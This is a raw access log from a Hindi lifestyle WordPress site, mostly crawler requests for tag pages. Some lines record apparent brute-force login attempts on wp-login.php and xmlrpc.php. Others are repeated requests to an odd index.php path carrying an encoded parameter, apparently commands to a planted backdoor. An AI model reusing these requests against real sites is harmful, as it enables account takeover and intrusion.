103.231.202.90 - - [20/Oct/2025:08:40:39 -0400] "POST /wp-login.php HTTP/2.0" 200 7127 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
2a03:2880:f800:c:: - - [20/Oct/2025:08:40:40 -0400] "GET /tag/fear-of-writing/ HTTP/2.0" 200 149763 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
216.244.66.235 - - [20/Oct/2025:08:40:40 -0400] "GET /tag/unlikely-couples-photos/ HTTP/2.0" 200 149767 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; [email protected])"
178.62.13.41 - - [20/Oct/2025:08:40:49 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
216.244.66.235 - - [20/Oct/2025:08:40:48 -0400] "GET /tag/uttarakhand-naini-lake-news-in-hindi/ HTTP/2.0" 200 149770 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; [email protected])"
178.62.13.41 - - [20/Oct/2025:08:40:49 -0400] "POST /wp-login.php HTTP/2.0" 200 7127 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
66.116.199.115 - - [20/Oct/2025:08:38:23 -0400] "GET /wp-admin/js/js/js/index.php?ARRAY=7o2230223n313736303936373530332p2231223n22687474703n5p2s5p2s7n7335363076313373752r646s776973652r6s6r655p2s3s6p633q7068705s636s64655s6n6326743q313736303936333930332q3565353466613036616362623662346335383937643964383634363630353732222p2232223n226435303535656434643363393431613038346662623562313330363063663765222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q33322q35312q36332q37332q38322q3239227q HTTP/2.0" 200 - "-" "-"
67.20.76.217 - - [20/Oct/2025:08:40:54 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
192.64.118.19 - - [20/Oct/2025:08:40:54 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
192.64.118.19 - - [20/Oct/2025:08:40:55 -0400] "POST /wp-login.php HTTP/2.0" 200 7127 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
67.20.76.217 - - [20/Oct/2025:08:40:55 -0400] "POST /wp-login.php HTTP/2.0" 200 7131 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
216.244.66.235 - - [20/Oct/2025:08:40:55 -0400] "GET /tag/want-to-avoid-tea/ HTTP/2.0" 200 149378 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; [email protected])"
103.185.75.197 - - [20/Oct/2025:08:41:00 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
103.185.75.197 - - [20/Oct/2025:08:41:01 -0400] "POST /wp-login.php HTTP/2.0" 200 7090 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
185.191.171.3 - - [20/Oct/2025:08:41:01 -0400] "GET /tag/soya-bean-kebab-recipe-in-hindi/ HTTP/2.0" 200 149393 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
103.153.42.48 - - [20/Oct/2025:08:41:05 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
141.94.174.23 - - [20/Oct/2025:08:41:05 -0400] "POST /xmlrpc.php HTTP/2.0" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36 OPR/52.0.2871.99"
216.244.66.235 - - [20/Oct/2025:08:41:05 -0400] "GET /tag/what-does-losing-your-virginity-feel-like/ HTTP/2.0" 200 150203 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; [email protected])"
103.153.42.48 - - [20/Oct/2025:08:41:09 -0400] "POST /wp-login.php HTTP/2.0" 200 7131 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
66.116.199.115 - - [20/Oct/2025:08:38:45 -0400] "GET /wp-admin/js/js/js/index.php?ARRAY=7o2230223n313736303936373532352p2231223n22687474703n5p2s5p2s7n7335363076313373752r646s776973652r6s6r655p2s3s6p633q7068705s636s64655s6n6326743q313736303936333932352q6665656464303139363632623937643638303939306461373265313364343836222p2232223n226435303535656434643363393431613038346662623562313330363063663765222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q33322q35312q36332q37332q38322q3239227q HTTP/2.0" 200 - "-" "-"
216.244.66.235 - - [20/Oct/2025:08:41:14 -0400] "GET /tag/what-to-do-at-work-when-there-is-no-work/ HTTP/2.0" 200 149797 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; [email protected])"
2a03:2880:f800:d:: - - [20/Oct/2025:08:41:16 -0400] "GET /tag/style-fashion-tips HTTP/2.0" 301 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
85.208.96.199 - - [20/Oct/2025:08:41:16 -0400] "GET /tag/thyroid-effects/ HTTP/2.0" 200 149461 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
2a03:2880:f800:3a:: - - [20/Oct/2025:08:41:19 -0400] "GET /tag/style-fashion-tips/ HTTP/2.0" 200 149657 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
185.191.171.10 - - [20/Oct/2025:08:41:22 -0400] "GET /tag/%E0%A4%86%E0%A4%95%E0%A4%B0%E0%A5%8D%E0%A4%B7%E0%A4%95-%E0%A4%AA%E0%A4%B2%E0%A4%95%E0%A5%8B%E0%A4%82/ HTTP/2.0" 200 149520 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
216.244.66.235 - - [20/Oct/2025:08:41:23 -0400] "GET /tag/which-colour-lipstick-suits-dark-skin/ HTTP/2.0" 200 149912 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; [email protected])"
66.116.199.115 - - [20/Oct/2025:08:39:07 -0400] "GET /wp-admin/js/js/js/index.php?ARRAY=7o2230223n313736303936373534372p2231223n22687474703n5p2s5p2s7n7335363076313373752r646s776973652r6s6r655p2s3s6p633q7068705s636s64655s6n6326743q313736303936333934372q3535323634383063316337323161653731653363333334323363373938316665222p2232223n226435303535656434643363393431613038346662623562313330363063663765222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q33322q35312q36332q37332q38322q3239227q HTTP/2.0" 200 - "-" "-"
216.244.66.235 - - [20/Oct/2025:08:41:32 -0400] "GET /tag/why-is-christmas-important/ HTTP/2.0" 200 149957 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; [email protected])"
216.244.66.235 - - [20/Oct/2025:08:41:40 -0400] "GET /tag/why-we-feel-cold-in-winter/ HTTP/2.0" 200 149645 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; [email protected])"
216.244.66.235 - - [20/Oct/2025:08:41:48 -0400] "GET /tag/%E0%A4%86%E0%A4%AA%E0%A4%95%E0%A5%80-%E0%A4%89%E0%A4%AE%E0%A5%8D%E0%A4%B0/ HTTP/2.0" 200 149688 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; [email protected])"
85.208.96.206 - - [20/Oct/2025:08:41:49 -0400] "GET /tag/laxmi-puja-mantra/ HTTP/2.0" 200 149933 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.59.17.234 - - [20/Oct/2025:08:41:54 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
185.59.17.234 - - [20/Oct/2025:08:41:55 -0400] "POST /wp-login.php HTTP/2.0" 200 7131 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
66.116.199.115 - - [20/Oct/2025:08:39:29 -0400] "GET /wp-admin/js/js/js/index.php?ARRAY=7o2230223n313736303936373536392p2231223n22687474703n5p2s5p2s7n7335363076313373752r646s776973652r6s6r655p2s3s6p633q7068705s636s64655s6n6326743q313736303936333936392q3337396164653261393862366364366537303662306232396664343962363265222p2232223n226435303535656434643363393431613038346662623562313330363063663765222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q33322q35312q36332q37332q38322q3239227q HTTP/2.0" 200 - "-" "-"
37.60.254.254 - - [20/Oct/2025:08:41:58 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
37.60.254.254 - - [20/Oct/2025:08:41:59 -0400] "POST /wp-login.php HTTP/2.0" 200 7131 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
216.244.66.235 - - [20/Oct/2025:08:41:58 -0400] "GET /tag/%E0%A4%95%E0%A4%B2%E0%A4%B0%E0%A4%AB%E0%A5%81%E0%A4%B2-%E0%A4%B2%E0%A4%BF%E0%A4%AA-%E0%A4%AC%E0%A4%BE%E0%A4%AE/ HTTP/2.0" 200 149753 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; [email protected])"
162.240.38.165 - - [20/Oct/2025:08:42:04 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
162.240.38.165 - - [20/Oct/2025:08:42:07 -0400] "POST /wp-login.php HTTP/2.0" 200 7131 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
216.244.66.235 - - [20/Oct/2025:08:42:06 -0400] "GET /tag/%E0%A4%AC%E0%A4%BE%E0%A4%B2%E0%A5%8B%E0%A4%82-%E0%A4%95%E0%A5%8B-%E0%A4%B8%E0%A4%BE%E0%A4%AB/ HTTP/2.0" 200 149633 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; [email protected])"
103.124.95.251 - - [20/Oct/2025:08:42:10 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
85.208.96.194 - - [20/Oct/2025:08:42:09 -0400] "GET /tag/best-moisturizer-for-humid-climate/ HTTP/2.0" 200 149969 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
103.124.95.251 - - [20/Oct/2025:08:42:11 -0400] "POST /wp-login.php HTTP/2.0" 200 7131 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
147.192.206.81 - - [20/Oct/2025:08:42:13 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
216.244.66.235 - - [20/Oct/2025:08:42:14 -0400] "GET /tag/%E0%A4%AC%E0%A5%8D%E0%A4%B2%E0%A5%88%E0%A4%95-%E0%A4%9F%E0%A5%80/ HTTP/2.0" 200 149773 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; [email protected])"
147.192.206.81 - - [20/Oct/2025:08:42:16 -0400] "POST /wp-login.php HTTP/2.0" 200 7127 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
66.116.199.115 - - [20/Oct/2025:08:39:51 -0400] "GET /wp-admin/js/js/js/index.php?ARRAY=7o2230223n313736303936373539312p2231223n22687474703n5p2s5p2s7n7335363076313373752r646s776973652r6s6r655p2s3s6p633q7068705s636s64655s6n6326743q313736303936333939312q6362663961663338303165656164363165323330373138376630613137366139222p2232223n226435303535656434643363393431613038346662623562313330363063663765222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q33322q35312q36332q37332q38322q3239227q HTTP/2.0" 200 - "-" "-"
165.232.131.12 - - [20/Oct/2025:08:42:17 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
165.232.131.12 - - [20/Oct/2025:08:42:19 -0400] "POST /wp-login.php HTTP/2.0" 200 7090 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
216.73.216.143 - - [20/Oct/2025:08:42:22 -0400] "GET /tag/tips-for-staying-healthy-in-the-workplace HTTP/2.0" 301 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.244.66.235 - - [20/Oct/2025:08:42:23 -0400] "GET /tag/%E0%A4%B9%E0%A5%87%E0%A4%AF%E0%A4%B0-%E0%A4%B0%E0%A4%BF%E0%A4%82%E0%A4%97/ HTTP/2.0" 200 149703 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; [email protected])"
216.73.216.143 - - [20/Oct/2025:08:42:24 -0400] "GET /tag/tips-for-staying-healthy-in-the-workplace/ HTTP/2.0" 200 149855 "https://hindi.blushin.com/tag/tips-for-staying-healthy-in-the-workplace" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
66.249.73.72 - - [20/Oct/2025:08:42:25 -0400] "GET /?b=3901106360889dcd HTTP/2.0" 200 191881 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.143 - - [20/Oct/2025:08:42:28 -0400] "GET /late-sleepers-may-fall-sick/feed HTTP/2.0" 301 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.143 - - [20/Oct/2025:08:42:29 -0400] "GET /late-sleepers-may-fall-sick/feed/ HTTP/2.0" 200 903 "https://hindi.blushin.com/late-sleepers-may-fall-sick/feed" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.143 - - [20/Oct/2025:08:42:31 -0400] "GET /tag/antibiotic-eye-drops-over-the-counter HTTP/2.0" 301 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.244.66.235 - - [20/Oct/2025:08:42:31 -0400] "GET /tag/coconut-oil-with-curry-leaves-and-fenugreek-seeds/ HTTP/2.0" 200 150149 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; [email protected])"
216.73.216.143 - - [20/Oct/2025:08:42:32 -0400] "GET /tag/antibiotic-eye-drops-over-the-counter/ HTTP/2.0" 200 149732 "https://hindi.blushin.com/tag/antibiotic-eye-drops-over-the-counter" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
187.37.10.106 - - [20/Oct/2025:08:42:34 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
185.191.171.9 - - [20/Oct/2025:08:42:33 -0400] "GET /tag/coconut-oil-for-dandruff-reviews/ HTTP/2.0" 200 150272 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
187.37.10.106 - - [20/Oct/2025:08:42:37 -0400] "POST /wp-login.php HTTP/2.0" 200 7093 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
216.73.216.143 - - [20/Oct/2025:08:42:37 -0400] "GET /vegetables-that-help-you-grow-taller/vegetables-to-grow-taller4/feed HTTP/2.0" 301 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.143 - - [20/Oct/2025:08:42:38 -0400] "GET /vegetables-that-help-you-grow-taller/vegetables-to-grow-taller4/feed/ HTTP/2.0" 200 874 "https://hindi.blushin.com/vegetables-that-help-you-grow-taller/vegetables-to-grow-taller4/feed" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
66.116.199.115 - - [20/Oct/2025:08:40:13 -0400] "GET /wp-admin/js/js/js/index.php?ARRAY=7o2230223n313736303936373631332p2231223n22687474703n5p2s5p2s7n7335363076313373752r646s776973652r6s6r655p2s3s6p633q7068705s636s64655s6n6326743q313736303936343031332q6130366532326465326433663638373230333836656435613332383936306162222p2232223n226435303535656434643363393431613038346662623562313330363063663765222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q33322q35312q36332q37332q38322q3239227q HTTP/2.0" 200 - "-" "-"
216.73.216.143 - - [20/Oct/2025:08:42:40 -0400] "GET /tag/child-arguing-with-mother HTTP/2.0" 301 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.244.66.235 - - [20/Oct/2025:08:42:40 -0400] "GET /tag/enjoy-vacation-at-gangtok-an-exotic-location-in-india/ HTTP/2.0" 200 150189 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; [email protected])"
216.73.216.143 - - [20/Oct/2025:08:42:41 -0400] "GET /tag/child-arguing-with-mother/ HTTP/2.0" 200 149930 "https://hindi.blushin.com/tag/child-arguing-with-mother" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
185.191.171.5 - - [20/Oct/2025:08:42:46 -0400] "GET /tag/online-marriage-site-frauds/ HTTP/2.0" 200 149850 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
216.244.66.235 - - [20/Oct/2025:08:42:48 -0400] "GET /tag/garlic-under-pillow-myth/ HTTP/2.0" 200 154749 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; [email protected])"
216.73.216.143 - - [20/Oct/2025:08:42:56 -0400] "GET /tag/social-media-launch-announcement HTTP/2.0" 301 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.244.66.235 - - [20/Oct/2025:08:42:56 -0400] "GET /tag/hidden-extramarital-affairs-of-bollywood-celebrities/ HTTP/2.0" 200 149900 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; [email protected])"
216.73.216.143 - - [20/Oct/2025:08:42:57 -0400] "GET /tag/social-media-launch-announcement/ HTTP/2.0" 200 149882 "https://hindi.blushin.com/tag/social-media-launch-announcement" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.143 - - [20/Oct/2025:08:43:01 -0400] "GET /these-trendy-rings-to-make-a-fashion-statement-now/ring-2 HTTP/2.0" 301 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
66.116.199.115 - - [20/Oct/2025:08:40:35 -0400] "GET /wp-admin/js/js/js/index.php?ARRAY=7o2230223n313736303936373633352p2231223n22687474703n5p2s5p2s7n7335363076313373752r646s776973652r6s6r655p2s3s6p633q7068705s636s64655s6n6326743q313736303936343033352q3831323939336237623234343061356463623237623561303262333865633636222p2232223n226435303535656434643363393431613038346662623562313330363063663765222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q33322q35312q36332q37332q38322q3239227q HTTP/2.0" 200 - "-" "-"
216.73.216.143 - - [20/Oct/2025:08:43:03 -0400] "GET /these-trendy-rings-to-make-a-fashion-statement-now/ring-2/ HTTP/2.0" 200 150340 "https://hindi.blushin.com/these-trendy-rings-to-make-a-fashion-statement-now/ring-2" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.244.66.235 - - [20/Oct/2025:08:43:06 -0400] "GET /tag/how-many-times-hair-spa-should-be-done-in-a-month/ HTTP/2.0" 200 149867 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; [email protected])"
216.73.216.143 - - [20/Oct/2025:08:43:07 -0400] "GET /tag/eye-makeup-tips-for-small-eyes-with-pictures HTTP/2.0" 301 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.143 - - [20/Oct/2025:08:43:09 -0400] "GET /tag/eye-makeup-tips-for-small-eyes-with-pictures/ HTTP/2.0" 200 149913 "https://hindi.blushin.com/tag/eye-makeup-tips-for-small-eyes-with-pictures" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
66.249.73.73 - - [20/Oct/2025:08:43:11 -0400] "GET /112708208?entity=0112553042 HTTP/2.0" 200 195003 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.143 - - [20/Oct/2025:08:43:13 -0400] "GET /tag/cool-stylish-ways-to-wear-denim HTTP/2.0" 301 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.143 - - [20/Oct/2025:08:43:15 -0400] "GET /tag/cool-stylish-ways-to-wear-denim/ HTTP/2.0" 200 149627 "https://hindi.blushin.com/tag/cool-stylish-ways-to-wear-denim" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.244.66.235 - - [20/Oct/2025:08:43:15 -0400] "GET /tag/how-to-make-mac-and-cheese-with-sliced-cheese-and-no-milk/ HTTP/2.0" 200 149949 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; [email protected])"
66.249.73.73 - - [20/Oct/2025:08:43:18 -0400] "GET /116407172?entity=0116246890 HTTP/2.0" 200 190135 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.143 - - [20/Oct/2025:08:43:19 -0400] "GET /tag/advantages-of-fermented-food-in-hindi HTTP/2.0" 301 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.143 - - [20/Oct/2025:08:43:21 -0400] "GET /tag/advantages-of-fermented-food-in-hindi/ HTTP/2.0" 200 149579 "https://hindi.blushin.com/tag/advantages-of-fermented-food-in-hindi" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
85.208.96.197 - - [20/Oct/2025:08:43:21 -0400] "GET /tag/whitening-cream-for-hands-and-legs/ HTTP/2.0" 200 149704 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
66.116.199.115 - - [20/Oct/2025:08:40:58 -0400] "GET /wp-admin/js/js/js/index.php?ARRAY=7o2230223n313736303936373635382p2231223n22687474703n5p2s5p2s7n7335363076313373752r646s776973652r6s6r655p2s3s6p633q7068705s636s64655s6n6326743q313736303936343035382q6330366261656466386461323064623037643536633538656362623465386338222p2232223n226435303535656434643363393431613038346662623562313330363063663765222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q33322q35312q36332q37332q38322q3239227q HTTP/2.0" 200 - "-" "-"
216.244.66.235 - - [20/Oct/2025:08:43:23 -0400] "GET /tag/know-these-4-reasons-why-water-is-significant-for-skin-beauty/ HTTP/2.0" 200 150249 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; [email protected])"
216.73.216.143 - - [20/Oct/2025:08:43:25 -0400] "GET /tag/moist-orange-cake-recipe/feed HTTP/2.0" 301 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.143 - - [20/Oct/2025:08:43:27 -0400] "GET /tag/moist-orange-cake-recipe/feed/ HTTP/2.0" 200 5845 "https://hindi.blushin.com/tag/moist-orange-cake-recipe/feed" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
185.191.171.3 - - [20/Oct/2025:08:43:27 -0400] "GET /tag/best-skin-brightening-cream/ HTTP/2.0" 200 149602 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
66.249.73.72 - - [20/Oct/2025:08:43:27 -0400] "GET /recipes-how-to-chop-tomatoes-easy-way/chop-tomatoes-easy-way/?amp HTTP/2.0" 200 199107 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
